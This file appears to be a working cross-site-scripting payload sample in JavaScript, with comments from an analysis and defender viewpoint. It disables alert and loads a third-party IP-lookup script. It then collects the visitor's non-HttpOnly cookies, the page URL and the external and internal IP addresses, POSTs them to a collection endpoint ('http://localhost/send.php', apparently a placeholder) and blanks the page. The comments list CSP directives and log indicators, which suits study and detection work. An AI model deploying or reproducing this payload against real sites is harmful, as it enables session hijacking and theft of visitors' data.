xss.js
// Analysis note: this file is a cross-site-scripting (XSS) payload sample. The
// statements below run as soon as the script is evaluated in the affected page.

// Overwrite the global alert with a no-op, so any later alert() call on the
// page shows no dialog.
alert = function() {};
// Inject a third-party script (note the implicit global `a`). The returnCitySN
// object that f() reads is not defined in this file; presumably this response
// defines it — confirm against the endpoint's output.
a = document.createElement('script');
a.src = "https://pv.sohu.com/cityjson";
document.body.appendChild(a);
// Second injected script. Its src is empty on this page, so nothing visible
// here defines the IN_IP global that f() reads; presumably the URL was blanked
// before publishing — TODO confirm.
a = document.createElement("script");
a.src = ""
document.body.appendChild(a);
// Defender view: these dynamic <script> loads are governed by the page's
// Content-Security-Policy script-src directive; a policy that does not allow
// the host blocks the load and, with reporting enabled, records the attempt.
/**
 * Serialize an object as an application/x-www-form-urlencoded string.
 *
 * Every enumerable property reachable through for...in is included (inherited
 * ones too), with both key and value passed through encodeURIComponent.
 *
 * @param {Object} [data] - Key/value pairs to encode; null/undefined yields "".
 * @returns {string} "k1=v1&k2=v2" style string.
 */
function formatParams(data) {
  const pairs = [];
  for (const key in data) {
    const encodedKey = encodeURIComponent(key);
    const encodedValue = encodeURIComponent(data[key]);
    pairs.push(`${encodedKey}=${encodedValue}`);
  }
  return pairs.join("&");
}
/**
 * Minimal XMLHttpRequest wrapper.
 *
 * Normalizes `options` in place (type is upper-cased and defaults to "GET",
 * dataType defaults to "json" but is not otherwise used here), encodes
 * `options.data` with formatParams, and issues an asynchronous GET or POST.
 * Any other method results in no request being sent.
 *
 * Note for reviewers: the POST branch sends a form-encoded body with only a
 * Content-Type header set, and nothing here restricts `options.url` to the
 * page's own origin.
 *
 * @param {Object} [options]
 * @param {string} [options.url] - Request target.
 * @param {string} [options.type] - "GET" or "POST" (case-insensitive).
 * @param {Object} [options.data] - Parameters to encode.
 * @param {Function} [options.success] - Called with (responseText, responseXML) on 2xx.
 * @param {Function} [options.fail] - Called with the HTTP status otherwise.
 */
function ajax(options) {
  options = options || {};
  options.type = (options.type || "GET").toUpperCase();
  options.dataType = options.dataType || "json";

  const encoded = formatParams(options.data);

  // Legacy fallback for browsers that lack a native XMLHttpRequest.
  const xhr = window.XMLHttpRequest
    ? new XMLHttpRequest()
    : new ActiveXObject('Microsoft.XMLHTTP');

  xhr.onreadystatechange = function () {
    // Only act once the request has completed (readyState 4).
    if (xhr.readyState != 4) {
      return;
    }
    const status = xhr.status;
    const succeeded = status >= 200 && status < 300;
    if (succeeded) {
      if (options.success) {
        options.success(xhr.responseText, xhr.responseXML);
      }
    } else if (options.fail) {
      options.fail(status);
    }
  };

  switch (options.type) {
    case "GET":
      // The "?" is appended even when there are no parameters.
      xhr.open("GET", options.url + "?" + encoded, true);
      xhr.send(null);
      break;
    case "POST":
      xhr.open("POST", options.url, true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      xhr.send(encoded);
      break;
    default:
      // Unsupported method: nothing is sent.
      break;
  }
}
// Collects browser-visible values and POSTs them off-page through ajax().
// Scheduled by the setTimeout call at the end of the file.
// The four assignments below use no var/let/const, so each creates an
// implicit global.
function f(){
// External IP as reported by the returnCitySN global. That global is not
// defined in this file; presumably the injected cityjson script supplies it.
exip = returnCitySN['cip'];
// IN_IP is not defined anywhere in this file either; if it is still undefined
// when f() runs, this line throws a ReferenceError and nothing below executes.
inip = IN_IP["ip"];
// document.cookie returns only cookies that are not flagged HttpOnly, which is
// why session cookies should carry HttpOnly.
cookie = document.cookie;
// Despite the variable name, this is the full page URL (href), not just the host.
domain = document.location.href;
//alert("external ip : [" + exip + "]");
//alert("internal ip : [" + inip + "]");
//alert("vul domain : [" + domain + "]");
// Form-encoded POST of the collected values. The URL shown is localhost,
// presumably a placeholder for the collection endpoint. Defender view: a CSP
// connect-src directive that does not allow the destination blocks this
// request; in proxy or web logs the visible indicator is a POST to send.php
// carrying exip, domain, inip and cookie fields.
ajax({
url: "http://localhost/send.php",
type: "POST",
data: {"exip": exip, "domain": domain, "inip": inip, "cookie": cookie},
// An empty dataType is falsy, so ajax() replaces it with "json".
dataType: "",
// Both callbacks are empty: the response is ignored whether it succeeds or fails.
success: function (response, xml) {
},
fail: function (status) {
}
});
// Replace the global ajax with a no-op so any later call does nothing.
ajax = function() {};
// Remove the <body> element from the document, leaving the page blank.
document.body.remove();
}
// Run f() once, 500 ms after this script is evaluated. The delay presumably
// gives the injected scripts time to load and define the globals f() reads —
// TODO confirm.
window.setTimeout(f, 500)